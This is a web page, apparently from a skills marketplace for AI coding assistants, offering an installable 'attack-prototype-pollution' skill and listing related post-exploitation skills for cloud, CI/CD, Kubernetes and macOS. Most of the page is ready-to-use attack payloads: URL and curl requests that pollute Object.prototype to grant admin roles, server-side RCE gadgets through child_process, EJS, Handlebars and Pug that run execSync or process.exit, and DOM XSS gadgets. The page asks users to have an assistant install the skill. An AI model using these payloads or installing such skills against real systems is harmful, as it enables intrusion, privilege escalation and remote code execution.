菜单
JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-prototype-pollution |
| description | JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["prototype-pollution","javascript","web","xss","attack"] |
| tech_stack | ["javascript","nodejs","web"] |
| cwe_ids | ["CWE-1321"] |
| chains_with | ["attack-ssti"] |
| prerequisites | [] |
| severity_boost | {"attack-ssti":"Prototype pollution → SSTI gadgets = RCE"} |
Exploit JavaScript prototype pollution to modify Object.prototype, leading to XSS, privilege escalation, or RCE via gadget chains.
URL-based pollution:
https://TARGET/?__proto__[polluted]=1
https://TARGET/?__proto__.polluted=1
https://TARGET/?constructor[prototype][polluted]=1
https://TARGET/#__proto__[polluted]=1
Verify in browser console:
console.log(({}).polluted) // Should print "1" if vulnerable
# Merge/patch endpoints
curl -X POST https://TARGET/api/settings \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true}}'
curl -X PATCH https://TARGET/api/user/profile \
-d '{"constructor": {"prototype": {"role": "admin"}}}'
# Nested object merge
curl -X PUT https://TARGET/api/config \
-d '{"a": {"__proto__": {"polluted": true}}}'
# RCE via child_process gadget
curl -X POST https://TARGET/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require(\"child_process\").execSync(\"id\").toString())", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'
# EJS template gadget
curl -X POST https://TARGET/api/settings \
-d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"id\");s"}}'
# Handlebars gadget
curl -X POST https://TARGET/api/settings \
-d '{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "params": [], "path": {"type": "PathExpression", "original": "constructor"}}]}}'
Common DOM gadgets when Object.prototype is polluted:
// innerHTML gadget
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'
// src gadget
Object.prototype.src = 'javascript:alert(1)'
// href gadget
Object.prototype.href = 'javascript:alert(1)'
// data-* attributes
Object.prototype['data-tooltip'] = '<img src=x onerror=alert(1)>'
Express.js / Pug:
{"__proto__": {"block": {"type": "Text", "val": "x]));process.exit()//"}}}
Lodash merge:
{"__proto__": {"polluted": true}}
| Finding | Severity |
|---|---|
| Server-side RCE via prototype pollution gadget | Critical (P1) |
| Privilege escalation (isAdmin=true) | Critical (P1) |
| Client-side XSS via DOM gadget | High (P2) |
| Prototype pollution without known gadget | Medium (P3) |